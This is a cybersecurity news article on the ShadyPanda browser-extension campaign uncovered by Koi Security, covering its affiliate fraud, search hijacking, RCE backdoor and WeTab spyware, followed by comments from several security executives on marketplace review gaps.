7 Year Long ShadyPanda Attack Spied on 4.3M Chrome and Edge Users

Cybersecurity researchers at Koi Security have exposed a massive espionage operation by a group named ShadyPanda that infected over 4.3 million Chrome and Microsoft Edge browser users over approximately seven years. The attackers used a highly patient and sneaky tactic: they uploaded normal-looking extensions, gained user trust, and then quietly converted them into dangerous spyware.

The investigation found two major operations, including a 300,000-user remote code execution (RCE) backdoor using extensions like Clean Master and a separate 4-million-user spyware campaign led by extensions such as WeTab.

****The Evolution of Deception****

ShadyPanda’s success relied on exploiting trust over time, beginning with simple cybercrime. In 2023, the group ran its first large campaign using 145 extensions (disguised as wallpaper or productivity apps) under names like ‘nuggetsno15’ and ‘Zhang’ to conduct affiliate fraud.

They added tracking codes to links for sites like eBay and Amazon, generating hidden commissions. In 2024, they grew bolder, moving to actively control the browser, redirecting searches through a known hijacker called trovi.com and stealing real-time search data. To avoid detection, the malware would also switch to benign behaviour if a security researcher opened the browser’s developer tools.

****The Two Major Active Threats****

Threat 1: The RCE Backdoor Attack (300,000 Users)

This operation employed the “long game” by exploiting extensions that had operated legitimately for years. Some, like Clean Master (with over 300,000 installs), had even earned Google’s “Featured” and “Verified” statuses. Then, in mid-2024, a silent update transformed them. This meant the automatic update feature, designed for user security, became an easy attack vector for the malware without anyone noticing.

These updated extensions effectively became a backdoor using Remote Code Execution (RCE), allowing the attacker to run any program remotely on an infected computer. The extensions checked an outside server hourly for new commands. This enabled ShadyPanda to monitor nearly everything, from every website you visited to collecting a complete “fingerprint” of your browser, Koi Security’s blog post explains.

Source: Koi Security

Threat 2: The Spyware Empire (4 Million Users)

A separate, massive operation involved five other extensions, including WeTab (with three million installs alone), that actively collected data. This included every URL visited, all search queries, and even mouse clicks, with the data being sent to servers in China.

Source: Koi Security

The threat isn’t just limited to individual users. For companies, an infected computer could lead to stolen API keys and compromised internal systems.

This long-running attack exposed a critical weakness: official marketplaces focus too heavily on the initial submission of an extension rather than monitoring its behaviour later. This allowed ShadyPanda to patiently build a massive user base before launching the strike.

The key takeaway is that trust itself proved to be the biggest vulnerability. Users must be cautious of the extensions they install, even those with high ratings, to prevent the next silent attack.

Cybersecurity experts commented on the significance of the ShadyPanda operation, emphasising its risk to businesses. Randolph Barr, Chief Information Security Officer at Cequence Security, highlighted the strategic nature of the attackers.

“The most recent acts of ShadyPanda reveal that they are part of one of the most advanced and long-running browser supply chain efforts we’ve seen. Not only are the technical aspects important, but so is the patience,” said Barr.

He noted how the group leveraged trust, stating, “ShadyPanda demonstrated their commitment to long-term strategies by releasing clean extensions that garnered hundreds of thousands of installs, earning Google’s ‘Featured’ and ‘Verified’ trust badges, and leveraging these badges through consistent updates years later.”

Diane Downie, Senior Software Architect at Black Duck, focused on the difficulty of detection and the need for stricter security: “Malicious code poses a real challenge since it closely resembles legitimate code, leveraging the same convenience features but with bad intent… The ShadyPanda incident shows just how far those bad actors are willing to go.”

She advised organisations to adopt a tougher stance: “As this level of sophistication fast becomes the new normal, organisations need to take a serious zero-trust posture with their systems.”

Trey Ford, Chief Strategy and Trust Officer at Bugcrowd, pointed out a flaw in standard security practices: “ShadyPanda learned that Chrome’s review process, like most enterprise security teams, are focused on initial submissions… and not ongoing behaviour after initial approval.”

He concluded that modern attackers are strategic and patient: “The scariest ones play the long game… requiring continuous vigilance to detect and defend against.”